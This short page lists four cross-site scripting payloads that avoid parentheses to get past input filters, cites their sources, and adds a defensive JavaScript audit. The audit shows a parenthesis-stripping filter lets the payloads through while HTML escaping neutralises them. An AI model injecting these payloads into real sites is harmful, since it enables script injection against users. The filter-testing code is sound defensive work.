Depending on your specific scenario, you might want to try injecting one of these:
<img onerror="window.alert('hey')" src="bla"/>
<svg><script>alert&#40/hey/.source&#41</script></svg>
<img onerror="window.onerror=alert;throw 'hey'" src="bla"/>
<script>window.onerror=alert;throw "hey";</script>
Inspiration:
- http://www.thespanner.co.uk/2012/05/01/xss-technique-without-parentheses/
- https://security.stackexchange.com/a/36630/8000
- https://security.stackexchange.com/questions/71317/stored-cross-site-scripting-without-parentheses-or-spaces
- https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/
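
A defender-side check for the four strings listed above, added here and not part of the original gist: it runs them through a hypothetical parenthesis-stripping filter and through HTML output encoding, and reports which results still contain parseable markup. The function names (`stripParens`, `escapeHtml`, `hasLiveMarkup`, `audit`) are assumptions made for this example.

```javascript
// Added example, not code from the original gist.
// The four strings are the payloads listed on this page, used as test vectors.
const PAYLOADS = [
  `<img onerror="window.alert('hey')" src="bla"/>`,
  `<svg><script>alert&#40/hey/.source&#41</script></svg>`,
  `<img onerror="window.onerror=alert;throw 'hey'" src="bla"/>`,
  `<script>window.onerror=alert;throw "hey";</script>`,
];

// Hypothetical blacklist filter: removes literal parentheses and nothing else.
function stripParens(input) {
  return String(input).replace(/[()]/g, "");
}

// Output encoding for HTML element content and quoted attribute values.
// It is not sufficient for script, URL or CSS contexts.
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(input).replace(/[&<>"']/g, (ch) => map[ch]);
}

// True if the string still contains a sequence an HTML parser would read as a tag.
function hasLiveMarkup(s) {
  return /<[a-zA-Z\/!?]/.test(s);
}

// Compare the two defences on every test vector.
function audit(payloads) {
  return payloads.map((p) => ({
    payload: p,
    unchangedByParenFilter: stripParens(p) === p,
    survivesParenFilter: hasLiveMarkup(stripParens(p)),
    survivesEscaping: hasLiveMarkup(escapeHtml(p)),
  }));
}

for (const row of audit(PAYLOADS)) {
  console.log(
    `parenFilter=${row.survivesParenFilter ? "LIVE" : "inert"} ` +
    `escaped=${row.survivesEscaping ? "LIVE" : "inert"}  ${row.payload}`
  );
}
```

Three of the four strings pass through the parenthesis filter byte-for-byte, and the remaining one still reaches the page as a tag, while the encoded output contains no tag in any case.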